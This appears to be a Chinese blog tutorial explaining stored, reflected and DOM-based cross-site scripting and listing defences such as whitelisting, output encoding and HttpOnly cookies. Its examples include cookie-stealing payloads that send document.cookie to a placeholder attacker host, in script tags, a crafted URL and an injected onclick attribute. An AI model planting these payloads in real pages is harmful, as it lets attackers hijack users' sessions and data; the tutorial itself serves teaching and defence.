XSS,全称cross site scripting,是指黑客将恶意脚本代码嵌入网页中,当客户访问网页时,恶意脚本代码自动执行,从而达成黑客攻击目的的漏洞。
其主要危害就是cookie泄露,导致非法获取网站正常用户的权限,从而导致用户隐私数据的泄露。
一、存储型XSS
这种类型的XSS危害最大。
黑客在正常的评论、留言页面输入脚本<script>alert("xss")</script>,页面会把它当做正常的留言内容保存到后端。
任何用户在查看这条留言内容的时候,都会中招。倘若脚本是如下这种:
<script>
new Image().src="http://黑客的主机?cookie="+document.cookie;
</script>
那么任何用户在查看这条留言的时候就会将自己的cookie发送给黑客,从而泄露了自己的cookie。
二、反射型XSS
这种攻击方式需要诱导用户点击黑客特制的链接才能实现。
比如用户已经登录网站,现在网站上有一个get请求是将name参数传递到后端,然后后端再将name的内容返回给前端进行展示的。
黑客将这个链接改造成如下的样子:
http://正常的网站?name=<script>new Image().src=
"http://黑客的主机?cookie="+encodeURI(document.cookie);</script>
然后,黑客会诱导已经登录的用户点击这个链接,当点击后,用户的cookie就发送到了黑客的主机上,从而泄露了cookie。
三、DOM型XSS
区别于前两种XSS,DOM型XSS的发生过程不会与后端有交互,是纯前端造成的。
假设正常网站会将用户的输入或者URL上的参数作为标签的属性填入DOM中,那么黑客就可以使用特制的输入内容或者诱导用户点击链接,来使得原标签闭合,并触发嵌入的恶意脚本。
比如,页面上有这样一个标签,其href的内容采用了用户输入的内容或者URL链接上的部分参数。
<a href="+输入内容或者URL参数+">点击</a>
然后,黑客将输入内容或者URL的参数值改为:
#" onclick="new Image().src='http://黑客的主机?cookie='+document.cookie;
那么这个超链接就变成了如下的形式:
<a href="#" onclick="new Image().src='http://黑客的主机?
cookie='+document.cookie;">点击</a>
如此,当用户点击这个按钮的时候,就会将自己的cookie发送给黑客,从而泄露的cookie。
四、如何防范XSS攻击
- 对输入参数进行校验和过滤;
- 白名单,如果可以的话,前后端都需要对参数进行白名单校验,即只允许参数为某种类型的内容,这种是最严格也是最有效的防范措施;
- 黑名单,对常见的导致XSS攻击的字符进行过滤或者替换,比如:
可以将这些特殊的字符过滤掉,或者使用全角的符号进行替换;<、>、’、“、\、\\、#、&、%
AntiSamy是Java领域的XSS Filter的实现。 - 对输出内容进行编码;
可以使用URLEncoder.encode之类的方法对输出内容进行编码,如此一些容易导致XSS攻击的特殊字符会被编码成为字符实体,比如“<”会成为“%3C”,编码之后的内容返回给浏览器时就不会被当做脚本执行,但是不影响被解码还原为"<”进行展示。
ESAPI是Java领域为返回内容做编码处理的工具。String xss = "<script>alert('123');</script>"; String result = URLEncoder.encode(xss); // %3Cscript%3Ealert%28%27123%27%29%3B%3C%2Fscript%3E log.info("{}",result); - 开启httponly
服务端如果设置了cookie的httponly属性为开启状态,那么浏览器端就不再允许通过document.cookie来获取用户的cookie了。
网友评论